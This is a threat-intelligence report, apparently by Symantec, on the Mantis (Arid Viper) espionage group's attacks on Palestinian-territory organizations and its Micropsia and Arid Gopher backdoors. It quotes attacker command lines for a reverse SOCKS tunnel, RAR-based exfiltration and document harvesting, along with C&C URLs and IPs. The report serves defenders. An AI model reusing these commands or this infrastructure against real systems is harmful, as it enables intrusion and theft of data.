The Mantis cyber-espionage group (aka Arid Viper, Desert Falcon, APT-C-23), a threat actor believed to be operating out of the Palestinian territories, is continuing to mount attacks, deploying a refreshed toolset and going to great lengths to maintain a persistent presence on targeted networks.
While the group is known for targeting organizations in the Middle East, the most recent campaign uncovered by Symantec, by Broadcom Software, focused on organizations within the Palestinian territories, with malicious activity beginning in September 2022 and continuing to at least February 2023. This targeting is not unprecedented for Mantis and Symantec previously uncovered attacks against individuals located in the Palestinian territories during 2017.
Background
Mantis has been active since at least 2014, with some third-party reporting suggesting it may have been active as early as 2011. The group is known to target organizations in Israel and a number of other Middle Eastern countries. Sectors targeted include government, military, financial, media, education, energy, and think tanks. The group is known for employing spear-phishing emails and fake social media profiles to lure targets into installing malware on their devices.
Mantis is widely accepted to be linked to the Palestinian territories. While other vendors have linked the group to Hamas, Symantec cannot make a definitive attribution to any Palestinian organization.
In its most recent attacks, the group used updated versions of its custom Micropsia and Arid Gopher backdoors to compromise targets before engaging in extensive credential theft and exfiltration of stolen data.
Attack chain
The initial infection vector for this campaign remains unknown. In one organization targeted, a feature of the compromise was that the attackers deployed three distinct versions of the same toolset (i.e. different variants of the same tools) on three groups of computers. Compartmentalizing the attack in this fashion was likely a precautionary measure. If one toolset was discovered, the attackers would still have a persistent presence on the target’s network.
The following is a description of how one of those three toolsets was used:
The first evidence of malicious activity occurred on December 18, 2022. Three distinct sets of obfuscated PowerShell commands were executed to load a Base64-encoded string, which started embedded shellcode. The shellcode was a 32-bit stager that downloaded another stage using basic TCP-based protocol from a command-and-control (C&C) server: 104.194.222[.]50 port 4444.
The attackers returned on December 19 to dump credentials before downloading the Micropsia backdoor and Putty, a publicly available SSH client, using Certutil and BITSAdmin
Micropsia subsequently executed and initiated contact with a C&C server. On the same day, Micropsia also executed on three other machines in the same organization. In each case, it ran in a folder named after its file name:
- csidl_common_appdatasystempropertiesinternationaltimesystempropertiesinternationaltime.exe
- csidl_common_appdatawindowsnetworkmanagerwindowsnetworkmanager.exe
- csidl_common_appdatawindowspswindowsps.exe
On one computer, Micropsia was used to set up a reverse socks tunnel to an external IP address:
CSIDL_COMMON_APPDATAwindowsservicemanageavwindowsservicemanageav.exe -connect 104.194.222[.]50:443 [REDACTED]
On December 20, Micropsia was used to run an unknown executable named windowspackages.exe on one of the infected computers.
The following day, December 21, RAR was executed to archive files on another infected computer.
Between December 22 and January 2, 2023, Micropsia was used to execute the Arid Gopher backdoor on three infected computers. Arid Gopher was in turn used to run a tool called SetRegRunKey.exe that provided persistence by adding Arid Gopher to the registry so that it executed on reboot. It also ran an unknown file named localsecuritypolicy.exe (this file name was used for the Arid Gopher backdoor elsewhere by the attackers).
On December 28, Micropsia was used to run windowspackages.exe on three more infected computers.
On December 31, Arid Gopher executed two unknown files named networkswitcherdatamodell.exe and networkuefidiagsbootserver.exe on two of the infected computers.
On January 2, the attackers retired the version of Arid Gopher they were using and introduced a new variant. Whether this was because the first version was discovered or whether it was standard operating procedure is unclear.
On January 4, Micropsia was used to execute two unknown files, both named hostupbroker.exe, on a single computer from the folder: csidl_common_appdatahostupbrokerhostupbroker.exe. This was immediately followed by the exfiltration of a RAR file:
CSIDL_COMMON_APPDATAwindowsupservwindowsupserv.exe -f CSIDL_COMMON_APPDATAwindowspackages�1-04-2023-15-13-39_getf.rar
On January 9, Arid Gopher was used to execute two unknown files on a single computer:
- csidl_common_appdatateamviewrremoteserviceteamviewrremoteservice.exe
- csidl_common_appdataembededmodeserviceembededmodeservice.exe
The last malicious activity occurred from January 12 onwards when Arid Gopher was used to execute the unknown file named localsecuritypolicy.exe every ten hours.
Micropsia
Variants of the Micropsia backdoor used in these attacks appear to be slightly updated versions of those seen by other vendors. In this campaign, Micropsia was deployed using multiple file names and file paths:
- csidl_common_appdatamicrosoftdotnet35microsoftdotnet35.exe
- csidl_common_appdatamicrosoftservicesusermanualsystempropertiesinternationaltime.exe
- csidl_common_appdatasystempropertiesinternationaltimesystempropertiesinternationaltime.exe
- csidl_common_appdatawindowsnetworkmanagerwindowsnetworkmanager.exe
- csidl_common_appdatawindowspswindowsps.exe
Micropsia is executed using WMI and its main purpose appears to be running secondary payloads for the attackers. These included:
- Arid Gopher (file names: networkvirtualizationstartservice.exe, networkvirtualizationfiaservice.exe, networkvirtualizationseoservice.exe)
- Reverse SOCKs Tunneler (aka Revsocks) (file name: windowsservicemanageav.exe)
- Data Exfiltration Tool (file name: windowsupserv.exe)
- Two unknown files, both named hostupbroker.exe
- Unknown file named windowspackages.exe
In addition to this, Micropsia has its own functionality, such as taking screenshots, keylogging, and archiving certain file types using WinRAR in preparation for data exfiltration:
“%PROGRAMDATA%Software DistributionsWinRARRar.exe” a -r -ep1 -v2500k -hp71012f4c6bdeeb73ae2e2196aa00bf59_d01247a1eaf1c24ffbc851e883e67f9b -ta2023-01-14 “%PROGRAMDATA%Software DistributionsBdlLMth__C_2023-02-13 17-14-41” “%USERPROFILE%*.xls” “%USERPROFILE%*.xlsx” “%USERPROFILE%*.doc” “%USERPROFILE%*.docx” “%USERPROFILE%*.csv” “%USERPROFILE%*.pdf” “%USERPROFILE%*.ppt” “%USERPROFILE%*.pptx” “%USERPROFILE%*.odt” “%USERPROFILE%*.mdb” “%USERPROFILE%*.accdb” “%USERPROFILE%*.accde” “%USERPROFILE%*.txt” “%USERPROFILE%*.rtf” “%USERPROFILE%*.vcf”
Arid Gopher
Unlike Micropsia, which is written in Delphi, Arid Gopher is written in Go. Versions of Arid Gopher used in this campaign contain the following embedded components:
- 7za.exe – A copy of the legitimate 7-Zip executable
- AttestationWmiProvider.exe – A tool that sets a “run” registry value
- ServiceHubIdentityHost.exe – A copy of legitimate Shortcut.exe executable from Optimum X
- Setup.env – Configuration file
Arid Gopher was also used to launch the following unknown files: networkswitcherdatamodell.exe, localsecuritypolicy.exe, and networkuefidiagsbootserver.exe, in addition to being used to download and execute files obfuscated with PyArmor.
When communicating with a C&C server, Arid Gopher registers a device on one path then connects to another path, likely to receive commands:
- Connects to: http://jumpstartmail[.]com/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 79.133.51[.]134) – likely to register device
- Followed by: http://jumpstartmail[.]com/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC – likely to receive commands
- Connects to: http://salimafia[.]net/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 146.19.233[.]32) – likely to register device
Followed by: http://salimafia[.]net/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC – likely to receive commands
Arid Gopher appears to be regularly updated and rewritten by the attackers, most likely in order to evade detection. One variant of the malware was radically different from previous versions seen with most of the distinctive code updated, so much so that there was not a single subroutine that contained identical distinctive code when compared with the previous version. Mantis appeared to be aggressively mutating the logic between variants, which is a time-intensive operation if done manually.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks